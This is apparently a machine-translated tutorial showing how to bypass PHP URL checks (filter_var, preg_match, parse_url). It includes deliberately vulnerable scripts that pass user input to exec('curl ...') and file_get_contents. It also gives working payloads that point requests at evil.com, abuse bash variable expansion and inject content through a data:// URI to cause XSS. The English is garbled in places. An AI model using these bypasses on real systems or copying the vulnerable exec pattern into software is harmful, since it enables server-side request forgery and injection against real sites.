0x01 Foreword
Transfer: Pino_HD
Code 0x02
<?php
echo "Argument: ".$argv[1]."\n";
//check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)){
//parse URL
$r = parse_url($argv[1]);
print_r($r);
//check if host ends with google.com
if(preg_match('/baidu\.com$/', $r['host'])){
//get page from URL
exec('curl -v -s "'.$r['host'].'"', $a);
print_r($a);
}else{
echo "Error: Host not allowed";
}
}else{
echo "Error: Invalid URL";
}
?>
This code uses the filter_var()
function, preg_match()
the function to filter, and a parse_url()
parsing function. Finally, the exec function to execute the curl command to access the URL.
pay attentionparse_url
Picture pointed out that parse_url
does not validate url
correctness.
0x03 text of the bypass filter_var and preg_match
Many URL structure to keep some special characters used to represent special meaning, these different signs in the URL location has its special semantics. Character “;”, “/”, “?”, “:”, “@”, “=”
and “&”
are reserved. In addition to the hierarchical point in the path segment, the general syntax path segment is considered opaque. Generated URI applications usually reserved characters are used to separate the sections allowed. For example, “;”
and “=”
used to separate parameters and parameter values. Comma has a similar effect.
For example, some structures used name;v=1.1
to represent the name version是1.1
, but may also be used name,1.1
to denote the same meaning. Of course, for URL, these symbols reserved URL will depend on the algorithm to show their effect.
For example, if the hostname, URL used to “http://evil.com;baidu.com”
be curl
, or wget
such tools resolved tohost:evil.com,querything:baidu.com
Try running the code
Found the error, returns Invalid URL
, it is because the filter_var
function is not bypassed. filter_var
Function can resolve a variety of protocols, we can not try http
protocols, such as
0://evil.com;baidu.com
ok, successfully bypassed filter_var
and preg_match
function! But we find it does not resolve our url, do not worry, what we try to add a port number, because it is not, then the default http port is not 80
a
0://evil.com:80;baidu.com:80
Resolution succeeds!
Of course, we said before the comma can also be a function with a semicolon.
0x03 text of the bypass parse_url
parse_url
Function is not used to verify the correctness of the URL, but possible to resolve the URL, and the URL is divided into specific sections. In this case, the URL may be used to perform the bypass portion becomes variable.
0://evil$baidu.com
Of course, this is php5 environment, php7 when parse_url will automatically parse out $ baidu.com
Here, in the bash
middle, $var
is a variable, in this case $baidu
this variable is not defined is empty, that this URL is 0: // evil <empty> .com, is 0://evil.com
successfully bypassed!
But this approach also has its limitations because of the need to bash the use of properties, so only use php script exec()
, system()
when the command to complete execution function to execute commands like curl or wget.
0x04 body of data: // pseudo-protocol and use xss
With the above exec
different, here we use the file_get_content
function, php test code is as follows:
<?php
echo "Argument: ".$argv[1]."\n";
// check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)) {
// parse URL
$r = parse_url($argv[1]);
print_r($r);
// check if host ends with google.com
if(preg_match('/baidu\.com$/', $r['host'])) {
// get page from URL
$a = file_get_contents($argv[1]);
echo($a);
} else {
echo "Error: Host not allowed";
}
} else {
echo "Error: Invalid URL";
}
?>
Our task is to modify the content in the response body, add a“Hacked by Pino_HD”
data://text/plain;base64,SGFja2VkIGJ5IFBpbm8Kbaidu.com
Discovery parse_url
function to text
set became host
, then reported the Host not allowed
error. But do not worry, we can inject something into the MIME
type of place because php is do not care about MIME
type.
data://baidu.com/plain;base64,SGFja2VkIGJ5IFBpbm8K
ok, a successful write what we want to write in the response packet. So we can control the content of the response body, thereby formingxss